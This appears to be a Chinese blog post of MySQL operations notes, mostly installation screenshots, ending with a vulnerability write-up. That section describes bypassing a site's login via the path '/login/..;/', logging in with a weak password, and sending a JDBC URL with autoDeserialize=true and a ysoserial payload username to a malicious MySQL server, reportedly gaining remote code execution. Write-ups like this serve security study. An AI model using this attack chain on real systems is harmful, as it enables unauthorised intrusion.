运维知识点-MySQL从小白到入土


MySQL从小白到入土

  • mysql 服务器安装
  • windows mysql 服务
  • 漏洞复现-mysql jdbc反序列化-权限绕过

mysql 服务器安装

 https://dev.mysql.com/downloads/mysql/

运维知识点-MySQL从小白到入土_第1张图片

运维知识点-MySQL从小白到入土_第2张图片
运维知识点-MySQL从小白到入土_第3张图片
运维知识点-MySQL从小白到入土_第4张图片

https://www.cnblogs.com/xiaostudy/p/12262804.html

点餐小程序腾讯云服务器安装mysql8
运维知识点-MySQL从小白到入土_第5张图片

运维知识点-MySQL从小白到入土_第6张图片
运维知识点-MySQL从小白到入土_第7张图片
运维知识点-MySQL从小白到入土_第8张图片
运维知识点-MySQL从小白到入土_第9张图片
运维知识点-MySQL从小白到入土_第10张图片
运维知识点-MySQL从小白到入土_第11张图片
运维知识点-MySQL从小白到入土_第12张图片
运维知识点-MySQL从小白到入土_第13张图片
运维知识点-MySQL从小白到入土_第14张图片
运维知识点-MySQL从小白到入土_第15张图片
运维知识点-MySQL从小白到入土_第16张图片
运维知识点-MySQL从小白到入土_第17张图片
运维知识点-MySQL从小白到入土_第18张图片
运维知识点-MySQL从小白到入土_第19张图片
运维知识点-MySQL从小白到入土_第20张图片
运维知识点-MySQL从小白到入土_第21张图片
运维知识点-MySQL从小白到入土_第22张图片
运维知识点-MySQL从小白到入土_第23张图片
运维知识点-MySQL从小白到入土_第24张图片
运维知识点-MySQL从小白到入土_第25张图片
运维知识点-MySQL从小白到入土_第26张图片

windows mysql 服务

net start mysql

漏洞复现-mysql jdbc反序列化-权限绕过

乌云 通用系统的洞
fofa 查

运维知识点-MySQL从小白到入土_第27张图片

但是这个系统被他魔改过加了验证码,前端也加密了,老洞肯定没有。

运维知识点-MySQL从小白到入土_第28张图片
登录框大概长这样,
看了一下有shiro但是打不了。

运维知识点-MySQL从小白到入土_第29张图片

权限绕过发现/login/…;/ 能直接进去

运维知识点-MySQL从小白到入土_第30张图片
看不到任何数据,点系统参数配置这个功能发现404

运维知识点-MySQL从小白到入土_第31张图片
去看了下同cms的站,
发现直接访问index.jsp,
也可以进去(但是src那个站进不去不知道被咋改过)
发现这个功能跳到/adminLogin.jsp 然后弱口令admin123进去了

运维知识点-MySQL从小白到入土_第32张图片
当时直接把这个登录的包拿到src的那个站去试了一下

发现他只是把jsp删了实际上功能还在
然后就直接进到了系统参数配置这里

运维知识点-MySQL从小白到入土_第33张图片
大概长这样,有一个测试连接的功能,点了一下抓包,包结构如下
运维知识点-MySQL从小白到入土_第34张图片
可以控制mysql连接地址,于是想到mysql服务端读客户端文件。
将mysql连接地址改为恶意mysql服务端地址发包,好像不行
运维知识点-MySQL从小白到入土_第35张图片
然后又想到mysql jdbc反序列化,以前没搞过,在github找到一个项目。

 https://github.com/fnmsd/MySQL_Fake_Server

需要一个ysoserial.jar我这边使用的

  https://github.com/zema1/ysoserial

可以直接打回显,看了下上面那个项目的README感觉有点麻烦,于是直接把
运维知识点-MySQL从小白到入土_第36张图片

 url=jdbc:mysql://x.x.x.x:3306/test?autoDeserialize=true
&useUnicode=true
&characterEncoding=utf-8
&username=yso_urldns_http//www.baidu.com/
&password=123456	 

服务器这边开启恶意mysql服务端,发包。
运维知识点-MySQL从小白到入土_第37张图片
运维知识点-MySQL从小白到入土_第38张图片
成功RCE

你可能感兴趣的:(运维,mysql,数据库)